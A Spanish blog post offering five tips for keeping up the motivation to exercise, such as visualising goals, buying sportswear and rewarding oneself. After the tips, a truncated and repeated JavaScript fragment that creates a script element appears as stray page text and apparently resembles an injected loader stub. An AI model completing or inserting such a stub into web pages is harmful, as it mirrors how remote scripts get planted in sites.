Salud y belleza » Salud, ejercicios

Cómo mantener la motivación para hacer deporte

Sin Comentarios

Empezar a hacer deporte no es lo difícil. Lo difícil es encontrar la motivación necesaria para seguir una rutina y continuar haciendo ejercicio durante más tiempo y de forma continua. Por eso queremos que no lo dejes y te vamos a dar una serie de técnicas de motivación que te ayudarán a hacer ejercicio.

motivacion-deporte

- Hay que visualizar los objetivos. Para mejorar tu rendimiento procura visualizar la sesión de ejercicio en tu mente y así tendrás mayor sensación de energía.

- Divertirse: si no te diviertes percibirás el entrenamiento como un trabajo y un esfuerzo más. Pero si lo conviertes en algo entretenido y divertido será más motivador para seguir practicando deporte a largo plazo.

- Prepara tu ropa: aunque no te lo creas, comprarte ropa nueva especializada para el deporte te motivará mucho más para empezar y continuar tu hazaña. Será como tu uniforme de guerra.

- Mantener el positivismo: tienes que enfocar tus pensamientos en tus fortalezas e intentar evitar los pensamientos negativos.

- Date premios: es importante darte un refuerzo positivo para mantener la motivación en el ejercicio. Puede ser en forma de premios diarios o semanales: un spa, baño de vapor, un masaje o incluso un dulce para premiar tu esfuerzo.

¿Sigues estos trucos para mantener tu motivación con el deporte?

var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.